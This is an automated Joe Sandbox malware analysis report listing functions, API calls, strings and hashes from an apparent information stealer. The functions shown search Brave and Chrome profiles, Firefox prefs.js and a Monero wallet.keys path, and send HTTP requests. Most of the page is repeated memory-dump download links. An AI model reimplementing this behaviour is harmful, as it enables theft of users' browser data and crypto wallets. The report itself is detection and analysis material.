Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 28ee442f455f746807bc30fa0f55cbb827d95eee8c0ac3297f536cf273413414
Instruction ID: 045d0e61bbe8f9ba85a7f765f43726aa8b112e3675c39f34956134043da08184
Opcode Fuzzy Hash: 28ee442f455f746807bc30fa0f55cbb827d95eee8c0ac3297f536cf273413414
Instruction Fuzzy Hash: D8424471910108ABDB18FBB4DC96EED737DFB54300F404568B50AE6691EE34AB49CBA3

Function 008B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 008B492C
FindFirstFileA.KERNEL32(?,?), ref: 008B4943
StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
FindClose.KERNEL32(000000FF), ref: 008B4B92

Strings

%s\%s, xrefs: 008B49A4
%s\%s, xrefs: 008B49FB
%s\*, xrefs: 008B4920

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 252a914f4db46eaece637d2c29d887c550ecccc94918c8d987ea2af3d131fe95
Instruction ID: 20220101d80093af501a1525e016a42ecf25698155a93a8a49319ae1883cd1d8
Opcode Fuzzy Hash: 252a914f4db46eaece637d2c29d887c550ecccc94918c8d987ea2af3d131fe95
Instruction Fuzzy Hash: 2C6122B1910218ABCB24EBE4DC85FEA777CFB58700F04858CB649D6141EA75EB858F92

Function 008A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6

Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A4915
StrCmpCA.SHLWAPI(?,0127EA70), ref: 008A493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008C0DDB,00000000,?,?,00000000,?,",00000000,?,0127EA90), ref: 008A4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A4E49
InternetCloseHandle.WININET(00000000), ref: 008A4EAD
InternetCloseHandle.WININET(00000000), ref: 008A4EC5
HttpOpenRequestA.WININET(00000000,0127E9E0,?,0127E0F8,00000000,00000000,00400100,00000000), ref: 008A4B15

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

InternetCloseHandle.WININET(00000000), ref: 008A4ECF

Strings

------, xrefs: 008A4C69
", xrefs: 008A4BF2
------, xrefs: 008A49BD
", xrefs: 008A4D33
------, xrefs: 008A4B28

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 343c1ff8ef308fa23f4f9bb4608e9f175c7e11079afe0a669d39a3730f1f4293
Instruction ID: 9bd9f07ffeff906c61d7dc39db17ff030d1c55177e09871211852fc89edac548
Opcode Fuzzy Hash: 343c1ff8ef308fa23f4f9bb4608e9f175c7e11079afe0a669d39a3730f1f4293
Instruction Fuzzy Hash: EC12FC71910118AADB19EB94DCA2FEEB738FF14300F5041A9B106A6691EF706F49CF63

Function 008B3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008B3EC3
FindFirstFileA.KERNEL32(?,?), ref: 008B3EDA
StrCmpCA.SHLWAPI(?,008C0FAC), ref: 008B3F08
StrCmpCA.SHLWAPI(?,008C0FB0), ref: 008B3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 008B406C
FindClose.KERNEL32(000000FF), ref: 008B4081

Strings

%s\%s, xrefs: 008B3EB7

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 877cd79a9feb68b857eeadcd3f702d9240d601bbbf290e576b565af1d8bf4ce1
Instruction ID: 8dfb8ce0b9c953336a1c92520c34058626e1f2f47457dd09806d4317d9ec5063
Opcode Fuzzy Hash: 877cd79a9feb68b857eeadcd3f702d9240d601bbbf290e576b565af1d8bf4ce1
Instruction Fuzzy Hash: C95145B6900218ABCB24EBB4DC85EEA777CFB54700F00458CB659D6140DB75EB86CF52

Function 008AF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C15B8,008C0D96), ref: 008AF71E
StrCmpCA.SHLWAPI(?,008C15BC), ref: 008AF76F
StrCmpCA.SHLWAPI(?,008C15C0), ref: 008AF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 008AFAB1
FindClose.KERNEL32(000000FF), ref: 008AFAC3

Strings

prefs.js, xrefs: 008AF812

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: eaa8f6bd10363424762e95eaab4d859963844d19c3816f1289e7954f751d20ba
Instruction ID: 8ddaca6474c577d6884cf91786a9d75c365997ef946a355da4fafd8f384d9341
Opcode Fuzzy Hash: eaa8f6bd10363424762e95eaab4d859963844d19c3816f1289e7954f751d20ba
Instruction Fuzzy Hash: 17B14371900118ABDB28FF64DC95EEE7379FF55300F4081A8A50AD6692EF306B49CB93

Function 008A16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C510C,?,?,?,008C51B4,?,?,00000000,?,00000000), ref: 008A1923
StrCmpCA.SHLWAPI(?,008C525C), ref: 008A1973
StrCmpCA.SHLWAPI(?,008C5304), ref: 008A1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008A1D40
DeleteFileA.KERNEL32(00000000), ref: 008A1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 008A1E20
FindClose.KERNEL32(000000FF), ref: 008A1E32

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Strings

\*.*, xrefs: 008A17F1

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 169857ba600f783f2f1f86345cbee0c3486d7ba85036e41925697dd6eac94515
Instruction ID: 1ebb2f53ac2fd84ece084e723e1441204870c6c449a884d3b09e7ca83f1d2450
Opcode Fuzzy Hash: 169857ba600f783f2f1f86345cbee0c3486d7ba85036e41925697dd6eac94515
Instruction Fuzzy Hash: E812E271910118AADB29EB64CCA5EEE7378FF54300F4041A9B516E6691EF306F89CF92

Function 008ADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C14B0,008C0C2A), ref: 008ADAEB
StrCmpCA.SHLWAPI(?,008C14B4), ref: 008ADB33
StrCmpCA.SHLWAPI(?,008C14B8), ref: 008ADB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 008ADDCC
FindClose.KERNEL32(000000FF), ref: 008ADDDE

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: b792214746f231e1a0fbe935df6c0bfcd0225e6dc4eaece352e4ea44a3321f00
Instruction ID: 8d6eff6e51c37adffeb19dcc7dbb5d37f2ac23a5a66fcd8d7fea39ae6c02e282
Opcode Fuzzy Hash: b792214746f231e1a0fbe935df6c0bfcd0225e6dc4eaece352e4ea44a3321f00
Instruction Fuzzy Hash: 22917572900204A7DB18FBB4DC969ED737CFB95300F408568F85AD6691EE34AB09CB93

Function 008B7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

GetKeyboardLayoutList.USER32(00000000,00000000,008C05AF), ref: 008B7BE1
